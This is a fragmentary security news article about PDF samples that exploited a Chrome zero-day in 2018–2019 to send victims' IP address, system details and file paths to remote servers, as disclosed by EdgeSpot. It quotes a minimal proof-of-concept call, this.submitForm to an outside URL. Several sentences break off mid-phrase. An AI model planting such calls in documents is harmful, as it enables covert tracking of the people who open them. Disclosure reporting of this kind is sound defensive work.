Exploit detection service
When a victim opens the
The harvested data includes IP address, operating system and Chrome versions, and the full path of the PDF file on the victim’s system.
“Since late December 2018, EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day flaw.” reads the analysis published by EdgeSpot.
“The exploited vulnerability allows the sender of the PDF files to track the users and collect some user’s information when they use Google Chrome as a local PDF viewer.”
It is interesting to note, if the victims open the same files with Adobe Reader, nothing happens.
Experts noticed that the data is sent to the remote servers via
One of the files analyzed by EdgeSpot, it a weaponized version of a document from Lonely Planet on the history of the Bay Islands in Honduras.
Most of the samples detected by EdgeSpot have a low detection rate on VirusTotal, at the time of writing only two antivirus products are able to detect them.
“We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.” states the experts.
“We decided to release our finding prior to the patch because we think it’s better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away. “
The experts suggest as a temporary “workaround” to use an alternative PDF reader application for viewing received PDF documents locally or disconnect
Below the timeline